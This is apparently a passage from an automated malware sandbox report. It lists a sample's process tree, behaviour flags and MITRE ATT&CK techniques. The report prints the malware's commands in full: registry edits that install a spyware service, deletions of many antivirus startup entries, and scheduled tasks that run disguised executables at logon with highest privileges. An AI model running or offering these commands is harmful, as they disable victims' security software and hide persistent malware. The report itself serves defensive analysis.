-bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add 
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete 
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )
-
C:\Users\Admin\AppData\Local\Temp\E4CB.exe (depth 1)
  C:\Users\Admin\AppData\Local\Temp\E4CB.exe
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\E4CB.exe (depth 2)
  C:\Users\Admin\AppData\Local\Temp\E4CB.exe
-
C:\Users\Admin\AppData\Local\Temp\E4CB.exe (depth 2)
  C:\Users\Admin\AppData\Local\Temp\E4CB.exe
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\EEDE.exe (depth 1)
  C:\Users\Admin\AppData\Local\Temp\EEDE.exe
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exe (depth 2)
  C:\Windows\SysWOW64\WerFault.exe -u -p 996 -s 732
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exe (depth 2)
  C:\Windows\SysWOW64\WerFault.exe -u -p 996 -s 744
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exe (depth 2)
  C:\Windows\SysWOW64\WerFault.exe -u -p 996 -s 748
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exe (depth 2)
  C:\Windows\SysWOW64\WerFault.exe -u -p 996 -s 908
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe (depth 2)
  C:\Windows\SysWOW64\WerFault.exe -u -p 996 -s 852
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\F008.exe (depth 1)
  C:\Users\Admin\AppData\Local\Temp\F008.exe
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\F151.exe (depth 1)
  C:\Users\Admin\AppData\Local\Temp\F151.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\explorer.exe (depth 1)
  C:\Windows\SysWOW64\explorer.exe
-
C:\Windows\explorer.exe (depth 1)
  C:\Windows\explorer.exe
-
C:\Windows\SysWOW64\explorer.exe (depth 1)
  C:\Windows\SysWOW64\explorer.exe
-
C:\Windows\explorer.exe (depth 1)
  C:\Windows\explorer.exe
-
C:\Windows\SysWOW64\explorer.exe (depth 1)
  C:\Windows\SysWOW64\explorer.exe
- Suspicious use of WriteProcessMemory
-
C:\Windows\explorer.exe (depth 1)
  C:\Windows\explorer.exe
-
C:\Windows\SysWOW64\explorer.exe (depth 1)
  C:\Windows\SysWOW64\explorer.exe
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\explorer.exe (depth 1)
  C:\Windows\explorer.exe
-
C:\Windows\SysWOW64\explorer.exe (depth 1)
  C:\Windows\SysWOW64\explorer.exe
-
C:\Windows\system32\schtasks.exe (depth 1)
  schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\ProgramData\WindowsHolographicDevices\SpatialStore\explorer.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe (depth 1)
  schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\Prefetch\ReadyBoot\WmiPrvSE.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe (depth 1)
  schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\System32\shellstyle\RuntimeBroker.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe (depth 1)
  schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\System32\mfvdsp\RuntimeBroker.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe (depth 1)
  schtasks.exe /create /tn "HostData" /sc ONLOGON /tr "'C:\ProgramData\Systemd\process\HostData.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe (depth 1)
  schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Temp\GUM18A1.tmp\explorer.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Persistence
- Modify Existing Service (1)
- Registry Run Keys / Startup Folder (1)
- Scheduled Task (1)
Defense Evasion
- Modify Registry (3)
- Disabling Security Tools (1)
- Virtualization/Sandbox Evasion (1)
- Install Root Certificate (1)
Replay Monitor
Downloads